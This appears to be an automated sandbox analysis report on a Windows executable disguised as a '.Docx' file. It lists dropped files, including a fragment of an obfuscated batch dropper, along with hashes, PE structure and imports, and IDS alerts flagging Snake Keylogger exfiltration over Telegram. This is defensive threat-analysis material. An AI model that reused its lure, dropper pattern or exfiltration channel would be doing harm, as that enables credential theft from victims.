                                                                                                                      Process:C:\Users\user\Desktop\D.G Governor Istek,Docx.exe
                                                                                                                      File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):46543
                                                                                                                      Entropy (8bit):4.705001079878445
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
                                                                                                                      MD5:637A66953F03B084808934ED7DF7192F
                                                                                                                      SHA1:D3AE40DFF4894972A141A631900BD3BB8C441696
                                                                                                                      SHA-256:41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
                                                                                                                      SHA-512:2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
                                                                                                                      Malicious:false
                                                                                                                      Preview:@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .

                                                                                                                      C:\Users\Public\Libraries\xzeheenC.pif

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\D.G Governor Istek,Docx.exe
                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):175800
                                                                                                                      Entropy (8bit):6.631791793070417
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                                                                      MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                      SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                                                                      SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                                                                      SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                      Joe Sandbox View:
                                                                                                                      • Filename: qDKTsL1y44.exe, Detection: malicious, Browse
                                                                                                                      • Filename: PRODUCT.bat, Detection: malicious, Browse
                                                                                                                      • Filename: purchaseorder.bat, Detection: malicious, Browse
                                                                                                                      • Filename: PO11550.exe, Detection: malicious, Browse
                                                                                                                      • Filename: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, Detection: malicious, Browse
                                                                                                                      • Filename: PCMNil7wkU.exe, Detection: malicious, Browse
                                                                                                                      • Filename: tTIYCp2sf4.exe, Detection: malicious, Browse
                                                                                                                      • Filename: Re_Porforma_Invoice_60_downpayment_-_PT_Era_F1909003_Project_Kupang.exe, Detection: malicious, Browse
                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............|..8...,...@...@..@

                                                                                                                      Static File Info

                                                                                                                      General

                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):7.007121444882125
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                                                                      • Windows Screen Saver (13104/52) 0.13%
                                                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      File name:D.G Governor Istek,Docx.exe
                                                                                                                      File size:1'019'392 bytes
                                                                                                                      MD5:7d212d2dab091bec36a906828d270c65
                                                                                                                      SHA1:4d251936d754c47ee58e3913a99e2659e731ac98
                                                                                                                      SHA256:4390ad0a5bd9184058cc6e2fbe64f896f71b0f0e95c27d8769837c6f979b11db
                                                                                                                      SHA512:ac59413964d9c9a55bca14afa22834b50d4cb113107d647b50b94ce49b82d887a61d31e99daa0450ef35f2df44b7cc524738cdf36007b0e357eb3554cfbffe40
                                                                                                                      SSDEEP:24576:Mt8U4ln77mcFj7LF6iNQj0KyEB1zcwfPMed:0wnRQj0KyEB1zcwfPME
                                                                                                                      TLSH:2925AE32F1005976DD26A1F84C72C6F8641ABD313F27AC87F6B56D989E39B887C24193
                                                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                      File Icon

                                                                                                                      Icon Hash:1f7effffffffff3f

                                                                                                                      Static PE Info

                                                                                                                      General

                                                                                                                      Entrypoint:0x473804
                                                                                                                      Entrypoint Section:.itext
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                      DLL Characteristics:
                                                                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:c8740fc6ceabb3b749c3b5b31246f4e4

                                                                                                                      Entrypoint Preview

                                                                                                                      Instruction
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      add esp, FFFFFFF0h
                                                                                                                      mov eax, 00472770h
                                                                                                                      call 00007F3F28ADE471h
                                                                                                                      mov eax, dword ptr [004E066Ch]
                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                      call 00007F3F28B30675h
                                                                                                                      mov ecx, dword ptr [004E0764h]
                                                                                                                      mov eax, dword ptr [004E066Ch]
                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                      mov edx, dword ptr [0047233Ch]
                                                                                                                      call 00007F3F28B30675h
                                                                                                                      mov eax, dword ptr [004E066Ch]
                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                      call 00007F3F28B306E9h
                                                                                                                      call 00007F3F28ADC45Ch
                                                                                                                      lea eax, dword ptr [eax+00h]
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al

                                                                                                                      Data Directories

                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xe50000x26b6.idata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xf10000x10400.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xea0000x6e8c.reloc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0xe90000x18.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xe571c0x604.idata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                      Sections

                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x10000x719c00x71a00c20c03fd36d5c6a0f5f2d60e61342924False0.5268796410891089data6.554263214536427IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .itext0x730000x84c0xa00e9a65ab665fe60801328ffc6f137da75False0.527734375data5.5780106542915835IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .data0x740000x6c8000x6c8005f020c0c908042c75483e4983c9847a3False0.3889913954493088data6.614342699532481IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .bss0xe10000x36b40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .idata0xe50000x26b60x28001ccb97a5a4355e75c3a3fc645dd0b749False0.309765625data4.905692986550938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .tls0xe80000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .rdata0xe90000x180x200aaefc7498fcb77b5ed918f8d25bd6004False0.05078125data0.2069200177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .reloc0xea0000x6e8c0x7000337ed535b030e2648bb3b67f6124d43dFalse0.6292898995535714data6.663115031589674IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                      .rsrc0xf10000x104000x10400780d920e700e79be7d346383e076ef83False0.4636268028846154data6.013951978737078IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                      Resources

                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                      RT_CURSOR0xf1b180x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                      RT_CURSOR0xf1c4c0x134dataEnglishUnited States0.4642857142857143
                                                                                                                      RT_CURSOR0xf1d800x134dataEnglishUnited States0.4805194805194805
                                                                                                                      RT_CURSOR0xf1eb40x134dataEnglishUnited States0.38311688311688313
                                                                                                                      RT_CURSOR0xf1fe80x134dataEnglishUnited States0.36038961038961037
                                                                                                                      RT_CURSOR0xf211c0x134dataEnglishUnited States0.4090909090909091
                                                                                                                      RT_CURSOR0xf22500x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                      RT_BITMAP0xf23840x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                      RT_BITMAP0xf25540x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                                                                      RT_BITMAP0xf27380x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                      RT_BITMAP0xf29080x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                                                                      RT_BITMAP0xf2ad80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                                                                      RT_BITMAP0xf2ca80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                                                                      RT_BITMAP0xf2e780x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                                                                      RT_BITMAP0xf30480x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                      RT_BITMAP0xf32180x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                                                                      RT_BITMAP0xf33e80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                      RT_BITMAP0xf35b80xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                                                                      RT_ICON0xf36a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 1889 x 1889 px/m0.4228723404255319
                                                                                                                      RT_ICON0xf3b080x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 1889 x 1889 px/m0.29918032786885246
                                                                                                                      RT_ICON0xf44900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 1889 x 1889 px/m0.2535178236397749
                                                                                                                      RT_ICON0xf55380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 1889 x 1889 px/m0.18329875518672198
                                                                                                                      RT_DIALOG0xf7ae00x52data0.7682926829268293
                                                                                                                      RT_DIALOG0xf7b340x52data0.7560975609756098
                                                                                                                      RT_STRING0xf7b880x244data0.46379310344827585
                                                                                                                      RT_STRING0xf7dcc0x188data0.5943877551020408
                                                                                                                      RT_STRING0xf7f540xc8data0.685
                                                                                                                      RT_STRING0xf801c0x118data0.6035714285714285
                                                                                                                      RT_STRING0xf81340x3a8data0.4305555555555556
                                                                                                                      RT_STRING0xf84dc0x3a4data0.38197424892703863
                                                                                                                      RT_STRING0xf88800x370data0.4022727272727273
                                                                                                                      RT_STRING0xf8bf00x3ccdata0.33539094650205764
                                                                                                                      RT_STRING0xf8fbc0x214data0.49624060150375937
                                                                                                                      RT_STRING0xf91d00xccdata0.6274509803921569
                                                                                                                      RT_STRING0xf929c0x194data0.5643564356435643
                                                                                                                      RT_STRING0xf94300x3c4data0.3288381742738589
                                                                                                                      RT_STRING0xf97f40x338data0.42961165048543687
                                                                                                                      RT_STRING0xf9b2c0x294data0.42424242424242425
                                                                                                                      RT_RCDATA0xf9dc00x10data1.5
                                                                                                                      RT_RCDATA0xf9dd00x304data0.7033678756476683
                                                                                                                      RT_RCDATA0xfa0d40x712aDelphi compiled form 'TForm1'0.6897134967207456
                                                                                                                      RT_GROUP_CURSOR0x1012000x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                      RT_GROUP_CURSOR0x1012140x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                      RT_GROUP_CURSOR0x1012280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x10123c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x1012500x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x1012640x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x1012780x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_ICON0x10128c0x3edata0.8709677419354839

                                                                                                                      Imports

                                                                                                                      DLLImport
                                                                                                                      oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                      user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                                                                      kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                                                      kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                      user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                      gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                                                      version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                      kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtectEx, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryExW, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                                                                      kernel32.dllSleep
                                                                                                                      oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                                      comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create

                                                                                                                      Possible Origin

                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                      EnglishUnited States

                                                                                                                      Network Behavior

                                                                                                                      Suricata IDS Alerts

                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                      2024-12-18T16:16:41.243953+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549715185.166.143.49443TCP
                                                                                                                      2024-12-18T16:16:43.767945+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54971652.217.32.148443TCP
                                                                                                                      2024-12-18T16:17:03.338310+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549758149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:16.849018+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549782149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:16.923059+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549790149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:21.087865+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549799149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:21.181072+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549800149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:28.765406+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549812149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:28.797810+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549821149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:34.391819+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549829149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:34.460372+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549830149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:34.509640+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549835149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:36.342503+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549846149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:36.437927+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549848149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:36.520487+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549847149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:49.390103+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549854149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:49.444271+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549856149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:49.481843+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549857149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:51.381717+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549889149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:51.459517+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549888149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:51.484603+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549890149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:53.305533+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549896149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:53.484345+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549897149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:53.506958+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549898149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:55.370908+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549903149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:55.483625+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549904149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:55.524486+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549905149.154.167.220443TCP
